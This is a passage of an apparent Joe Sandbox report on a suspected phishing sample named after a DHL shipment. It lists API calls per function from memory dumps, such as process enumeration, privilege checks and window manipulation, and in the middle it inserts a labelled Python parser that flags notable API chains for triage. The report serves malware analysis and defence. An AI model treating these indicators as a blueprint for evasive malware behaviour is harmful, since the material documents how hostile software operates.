                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                            • String ID:
                                                                                            • API String ID: 2759813231-0
                                                                                            • Opcode ID: 73ff15e8bd002f8c760c4106c77059e260bd641c5f30dc87514c3ffb5385b50e
                                                                                            • Instruction ID: 3e0bea035d906cbf4e32e67c3160e62859b550625f9d459b113342bafd094e56
                                                                                            • Opcode Fuzzy Hash: 73ff15e8bd002f8c760c4106c77059e260bd641c5f30dc87514c3ffb5385b50e
                                                                                            • Instruction Fuzzy Hash: D7316F71D00159AFCB00EFA9D885CEEBBF9FF48304B5080A9E415E7211EB319E45CBA1
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0088D52F
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0088D5DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 420147892-0
                                                                                            • Opcode ID: ef5266b9ec9d56ea10e77f78bf9565a82b42f6e1192acebf87bba9fbffb1157c
                                                                                            • Instruction ID: e7b8cb62fcd5ef9511986840314f6378a2976ffca4c7f26900a97558ebe487b2
                                                                                            • Opcode Fuzzy Hash: ef5266b9ec9d56ea10e77f78bf9565a82b42f6e1192acebf87bba9fbffb1157c
                                                                                            • Instruction Fuzzy Hash: 9D3191711083009FD304EF58D885AAFBBE8FF99354F14092DF581D61A1EB719989CB93
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • GetCursorPos.USER32(?), ref: 008B9001
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00877711,?,?,?,?,?), ref: 008B9016
                                                                                            • GetCursorPos.USER32(?), ref: 008B905E
                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00877711,?,?,?), ref: 008B9094
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2864067406-0
                                                                                            • Opcode ID: fd47ff73b36a0e18a4fbcaf062d42661647906020793a67eada34099f792c63c
                                                                                            • Instruction ID: 9a1167df6578cf52f5d6e71409125919cb14cb8d70ef43f18bbc45c8cd83a9ed
                                                                                            • Opcode Fuzzy Hash: fd47ff73b36a0e18a4fbcaf062d42661647906020793a67eada34099f792c63c
                                                                                            • Instruction Fuzzy Hash: 76219F35600418EFCB259FA4C898EFA7BF9FB8A360F044165FA4587262D3719951DBA0
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(?,008BCB68), ref: 0088D2FB
                                                                                            • GetLastError.KERNEL32 ref: 0088D30A
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0088D319
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008BCB68), ref: 0088D376
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 2267087916-0
                                                                                            • Opcode ID: ed0ed07d8a77829bd2820639c70a4236ffe9e8892e76323bdd57f64c1ffb6002
                                                                                            • Instruction ID: 04cf3059233d0695b966763cf5b6de8f0a0c1f5d846418a7bc33fbd9c0e9eae7
                                                                                            • Opcode Fuzzy Hash: ed0ed07d8a77829bd2820639c70a4236ffe9e8892e76323bdd57f64c1ffb6002
                                                                                            • Instruction Fuzzy Hash: 94215C705093019F8710EF28D8818AEB7E4FE5A364F504A2DF4A9C73E1E7319946CB93
                                                                                            APIs
                                                                                              • Part of subcall function 00881014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0088102A
                                                                                              • Part of subcall function 00881014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00881036
                                                                                              • Part of subcall function 00881014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881045
                                                                                              • Part of subcall function 00881014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0088104C
                                                                                              • Part of subcall function 00881014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881062
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008815BE
                                                                                            • _memcmp.LIBVCRUNTIME ref: 008815E1
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00881617
                                                                                            • HeapFree.KERNEL32(00000000), ref: 0088161E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1592001646-0
                                                                                            • Opcode ID: a76a77a00e4946088e7e3d9f981742f0e2778bf5e7a7799535bf1177b54a586f
                                                                                            • Instruction ID: 8683abfe7c29d669094ce87dc538a2c24780d2667ebc96d62fb76e307f553cbb
                                                                                            • Opcode Fuzzy Hash: a76a77a00e4946088e7e3d9f981742f0e2778bf5e7a7799535bf1177b54a586f
                                                                                            • Instruction Fuzzy Hash: 1F212771E40109AFDF10EFA4C949BEEB7B8FF54354F184459E441EB241EB30AA46CBA0
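The API chains listed per function above (for instance the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW loop, and the GetTokenInformation(TokenIntegrityLevel) subcall beside LookupPrivilegeValueW) are the raw material for triage, but reading hundreds of such records by eye is slow. What follows is an added example, not Joe Sandbox code and not part of this report: a small Python parser for the record layout used here (the "• Name.MODULE(args), ref: ADDR" lines, the "Part of subcall function" prefix and the Similarity fields) that groups calls per function and flags a few API chains worth a closer look. The SAMPLE text is constructed in the same shape as the listing, the rule names and the Record/ApiCall types are this example's own, and the chains it flags also occur in the ordinary AutoIt runtime (the report notes the sample is likely a compiled AutoIt script), so a hit points at a function to inspect, not at a verdict.

```python
"""Parse Joe Sandbox per-function API listings and flag notable API chains.

Added example, not Joe Sandbox code: the record layout and the SAMPLE lines
follow the listing on this page; the rule names and the Record/ApiCall
types are this example's own.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample, two records in the same shape as the listing above.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0088D52F
• CloseHandle.KERNEL32(00000000), ref: 0088D5DC
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Instruction Fuzzy Hash: 9D3191711083009FD304EF58D885AAFBBE8FF99354F14092DF581D61A1EB719989CB93
APIs
  • Part of subcall function 00881014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0088102A
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008815BE
• _memcmp.LIBVCRUNTIME ref: 008815E1
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Instruction Fuzzy Hash: 1F212771E40109AFDF10EFA4C949BEEB7B8FF54354F184459E441EB241EB30AA46CBA0
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# "• Key: value" lines of the Similarity / Memory Dump Source blocks.
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: Optional[str]  # callee address when the call sits inside a subcall


@dataclass
class Record:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def key(self) -> str:
        # "API String ID" is the report's per-function key; fall back to the first ref.
        return self.fields.get("API String ID") or (self.apis[0].ref if self.apis else "?")

    def names(self, include_subcalls: bool = True) -> Set[str]:
        return {a.name for a in self.apis if include_subcalls or a.subcall is None}


def parse_records(text: str) -> List[Record]:
    """Split the listing into records; "Instruction Fuzzy Hash" closes each one."""
    records: List[Record] = []
    cur = Record()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = Record()
    if cur.apis or cur.fields:  # record cut off before its fuzzy hash
        records.append(cur)
    return records


# Each rule lists the API names that must all appear in one function (example's own names).
RULES: Dict[str, Set[str]] = {
    "process enumeration via Toolhelp32 snapshot":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "token integrity-level / privilege inspection":
        {"GetTokenInformation", "LookupPrivilegeValueW"},
    "layered (transparent) window setup":
        {"SetWindowLongW", "SetLayeredWindowAttributes"},
}


def match_rules(rec: Record, include_subcalls: bool = True) -> List[str]:
    names = rec.names(include_subcalls)
    return [rule for rule, needed in RULES.items() if needed <= names]


def triage(text: str) -> Dict[str, List[str]]:
    """Map each matching record's key to the rules it satisfies."""
    hits: Dict[str, List[str]] = {}
    for rec in parse_records(text):
        matched = match_rules(rec)
        if matched:
            hits[rec.key] = matched
    return hits


if __name__ == "__main__":
    for key, rules in triage(SAMPLE).items():
        print(key, "->", ", ".join(rules))
```

Run over the records in this section, the Toolhelp32 record, the token record and the SetLayeredWindowAttributes record would match; the SendMessageW and lstrcmpiW records would not. The include_subcalls switch matters for the token record: GetTokenInformation only appears there as a "Part of subcall function" line, so a direct-calls-only match misses it, which is the usual trade-off between noisy and blind when matching on flattened call sets.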
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 008B280A
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008B2824
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008B2832
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008B2840
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                            • String ID:
                                                                                            • API String ID: 2169480361-0
                                                                                            • Opcode ID: d2d98cb2313bea6ac12fea3ff7a37a67ad76466e47176d2706961c03b882e148
                                                                                            • Instruction ID: b7f371e5106fc49609008362dac242447d7a42a056a2002ca0c31d168ac7f3a4
                                                                                            • Opcode Fuzzy Hash: d2d98cb2313bea6ac12fea3ff7a37a67ad76466e47176d2706961c03b882e148
                                                                                            • Instruction Fuzzy Hash: 02219D31205525AFD7249B28C845FAA7B99FF85324F148258F426CB7E2CB71FC82CB95
                                                                                            APIs
                                                                                              • Part of subcall function 00888D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?), ref: 00888D8C
                                                                                              • Part of subcall function 00888D7D: lstrcpyW.KERNEL32(00000000,?,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00888DB2
                                                                                              • Part of subcall function 00888D7D: lstrcmpiW.KERNEL32(00000000,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?), ref: 00888DE3
                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887923
                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887949
                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887984
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                            • String ID: cdecl
                                                                                            • API String ID: 4031866154-3896280584
                                                                                            • Opcode ID: 02daf9095cc76d42531b7db46ccf502bb99a6761b846e0c88ccfbdd774992ae2
                                                                                            • Instruction ID: 6f916404bb4b55d4f46d60b5839c0aca88bccadf907875bedf495534fe6a1b3b
                                                                                            • Opcode Fuzzy Hash: 02daf9095cc76d42531b7db46ccf502bb99a6761b846e0c88ccfbdd774992ae2
                                                                                            • Instruction Fuzzy Hash: 4C11D63A200242ABCB15AF39DC45D7A7BB9FF85390B50402AF946CB365EF35D811C791
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B7D0B
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 008B7D2A
                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008B7D42
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0089B7AD,00000000), ref: 008B7D6B
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID:
                                                                                            • API String ID: 847901565-0
                                                                                            • Opcode ID: 0d62e2eb6550314341803c30b8961074c3e23cfd221772c87c8eda7d9dc110c5
                                                                                            • Instruction ID: 1731765e1dab2754a1dcdb9eff1e835c18cc8c54edee9b99095129e9ebb0c667
                                                                                            • Opcode Fuzzy Hash: 0d62e2eb6550314341803c30b8961074c3e23cfd221772c87c8eda7d9dc110c5
                                                                                            • Instruction Fuzzy Hash: 0B115E31615615AFCB109F68CC08EB63BA5FF853A0B254728F939D72F0D7319951DB90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 008B56BB
                                                                                            • _wcslen.LIBCMT ref: 008B56CD
                                                                                            • _wcslen.LIBCMT ref: 008B56D8
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008B5816
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 455545452-0
                                                                                            • Opcode ID: 38b9c6eb660ba3546abea8e24c84bf3172293ecd70d48751b316ec55cff9b590
                                                                                            • Instruction ID: 9de7ecd980983234982ae3549f0e23dce005beebc75b7678233f101b6266311b
                                                                                            • Opcode Fuzzy Hash: 38b9c6eb660ba3546abea8e24c84bf3172293ecd70d48751b316ec55cff9b590
                                                                                            • Instruction Fuzzy Hash: 5911D671600608AADF209F65DC85BEE7B6CFF21764F104126F915D6281EB70C984CB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be0138456bcdf4c392d1f682e0b641e16bbbf7579e6e475e0ae8928804e83777
                                                                                            • Instruction ID: db2082b1d874dae082b9e6a711f30f8c32cb7518164edfc03956ccc40104283f
                                                                                            • Opcode Fuzzy Hash: be0138456bcdf4c392d1f682e0b641e16bbbf7579e6e475e0ae8928804e83777
                                                                                            • Instruction Fuzzy Hash: 5D01A2B220561A3EFA21267C6CC4F676B2CFF813BAB300325FD31E11D2DB608C485160
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00881A47
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A59
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A6F
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00881A8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: ad04c9151f2d5ebadb7af7a48a8796abf20730c3bf1419087ad3405f0253b27c
                                                                                            • Instruction ID: 9fd7d22daeacdad5c0b0fa8c03e3d91a168be60a0329cdad7b269347885ce8b1
                                                                                            • Opcode Fuzzy Hash: ad04c9151f2d5ebadb7af7a48a8796abf20730c3bf1419087ad3405f0253b27c
                                                                                            • Instruction Fuzzy Hash: C0112A3A901229FFEF109BA4C985FADBB78FB08750F200091E610B7290DB716E51DB94
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0088E1FD
                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0088E230
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0088E246
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0088E24D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 2880819207-0
                                                                                            • Opcode ID: 97c1c20d3ab79fe6a46c755c7b24660bd84f967cd210d449b536c2bd76b85b5c
                                                                                            • Instruction ID: dbae3424a967e7bf2832d14a5a313dd19f510d7c8522991f8bdd3ad44dce13a0
                                                                                            • Opcode Fuzzy Hash: 97c1c20d3ab79fe6a46c755c7b24660bd84f967cd210d449b536c2bd76b85b5c
                                                                                            • Instruction Fuzzy Hash: B711A176904258ABCB01AFA89C09AAA7BADFB45320F144265F924E3391D7B4990487A0
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,?,0084CFF9,00000000,00000004,00000000), ref: 0084D218
                                                                                            • GetLastError.KERNEL32 ref: 0084D224
                                                                                            • __dosmaperr.LIBCMT ref: 0084D22B
                                                                                            • ResumeThread.KERNEL32(00000000), ref: 0084D249
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 173952441-0
                                                                                            • Opcode ID: bc015fb32e98a0440f7f7ab1e0298b520d865946beb842908bedcf3509878cb1
                                                                                            • Instruction ID: 9ad3e2bcb0151905e8fe88898823c0817ac4089081abaec9b3304ea40cbfd1c0
                                                                                            • Opcode Fuzzy Hash: bc015fb32e98a0440f7f7ab1e0298b520d865946beb842908bedcf3509878cb1
                                                                                            • Instruction Fuzzy Hash: 2D01C03680532CBBCB115BA9DC09AAA7BA9FF81331F104229F925D21D1CBB0990186A1
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                            • GetStockObject.GDI32(00000011), ref: 00826060
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
